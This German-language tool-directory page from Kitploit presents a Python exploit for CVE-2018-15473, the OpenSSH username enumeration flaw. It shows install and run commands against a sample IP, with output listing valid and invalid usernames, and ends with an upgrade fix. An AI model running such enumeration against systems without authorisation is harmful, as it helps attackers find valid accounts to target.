Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-15473 — OpenSSH 2.3 < 7.7 - Benutzernamen-Enumeration | Kitploit
Tools/GitHubGitHub/sait-nuri/cve-2018-15473
AufklärungSchwachstellenanalyseExploitationInformationsbeschaffungPenetrationstestsAuthentifizierung
GitHubsait-nuri/cve-2018-15473

CVE-2018-15473

OpenSSH 2.3 < 7.7 - Benutzernamen-Enumeration

Repository anzeigen
42138vor 5 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-15473

SSH-Benutzernamen-Enumeration-Exploit (OpenSSH 2.3 < 7.7)

Bearbeitete Version des ursprünglichen Exploits: https://www.exploit-db.com/exploits/45233

  • In Python3 konvertiert
  • Benutzernamen-Wortlisten-Option hinzugefügt

Ausführung

#Stellen Sie sicher, dass Sie die Abhängigkeiten installieren:
foo@bar:~$ pip3 install -r requirements.txt
#Für einen einzelnen Benutzernamen:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -u root
[+] root ist ein gültiger Benutzername
#Für mehrere Benutzernamen:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -w username_wordlist.txt
[+] root ist ein gültiger Benutzername
[-] mysql ist ein ungültiger Benutzername
[-] mike ist ein ungültiger Benutzername
[-] foo ist ein ungültiger Benutzername
[-] bar ist ein ungültiger Benutzername
Gültige Benutzer: 
root
#Für weitere Optionen:
foo@bar:~$ ./CVE-2018-15473.py -h

Über die Schwachstelle:

Das System reagiert unterschiedlich auf gültige und ungültige Authentifizierungsversuche. Ein entfernter Benutzer kann speziell gestaltete Anfragen senden, um gültige Benutzernamen auf dem Zielsystem zu ermitteln. Somit kann ein entfernter Benutzer gültige Benutzernamen auf dem Zielsystem ermitteln.

Lösung:

Der OpenSSH-Server sollte auf Version 7.7 oder höher aktualisiert werden.

Tool herunterladen